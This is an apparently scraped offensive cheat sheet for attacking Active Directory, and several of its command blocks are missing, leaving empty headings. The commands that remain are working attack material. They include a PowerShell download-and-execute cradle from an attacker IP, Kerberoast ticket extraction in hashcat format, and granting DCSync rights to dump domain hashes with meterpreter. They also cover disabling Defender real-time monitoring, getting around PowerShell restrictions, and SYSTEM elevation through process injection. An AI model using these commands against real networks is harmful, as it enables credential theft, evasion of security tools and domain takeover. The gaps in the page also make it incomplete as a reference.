Active Directory attack
Domain Enumeration + Exploitation
POWERSPLOIT
Use the dev
branch or PowerSploit. For an already incredible cheat sheet, check out HarmJ0y's.
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
Get Domain Users
Get-NetUser * -Domain corp.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset, lastlogontimestamp,accountexpires,admincount,userprincipalname, serviceprincipalname, mail,useraccountcontrol | Export-CSV users.csv
Get Domain Computers
Get-NetComputer * -Domain corp.local | Select-Object -Property dnshostname,operatingsystem,operatingsystemservicepack,lastlogontimestamp | Export-CSV computers.csv
SPN Ticket Request
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv .\ticket.csv -NoTypeInformation
Enumerate User DACLs
Reset Domain User Password
If you own the owner of another AD user object (WriteOwner
, WriteDACL
, GenericWrite
, Owner
, etc), you can reset the password with ease:
Or if you can set yourself as owner, the following will do:
Add/Exploit DCSync Rights
Do you have WriteDACL
to a domain? Give DCSync rights to an unprivileged domain user account:
Add-DomainObjectAcl -TargetIdentity "DC=burmatco,DC=local" -PrincipalIdentity useracct1 -Rights DCSync
And use these rights to dump the hashes from the domain:
meterpreter > dcsync_ntlm BURMATCO\\useracct1
BLOODHOUND
Ingestor Launch
LDAP QUERIES
Below are some useful LDAP queries that will help you enumerate a system. Some of them require a valid username/password to get more information. My go-to for these queries is ldapsearch
:
ASREPRoast Accounts
User Account Objects with SPNs
User and Computers with Unconstrained Delegation
Domain Administrators
Group Policies
EVADING AV
Checking Status
PowerShell Bypass with 32-bit
PowerShell disabled for you? Try running the 32-bit copy of it:
C:\windows\syswow64\windowspowershell\v1.0\powershell whoami
Writable Folders for Bypassing Execution Control
Try putting your payload in one of the following directories:
Turning Off Defender's RTM
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
AMSI Bypass
PROCESS ELEVATION (via SeDebugPrivilege)
If you run whoami /priv
and you see SeDebugPrivilege
set to Enabled
, you can assume you already have SYSTEM.
One way of doing it, is using decoder's psgetsys.ps1
script once you have a good idea on a PID to inject:
. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864,'C:\temp\burmat443.exe');
You can also gain a MSF session and use the module windows/manage/payload_inject
with a PID of your choice.
REMOTE DESKTOP
Enable RDP
MISCELLANEOUS
Last updated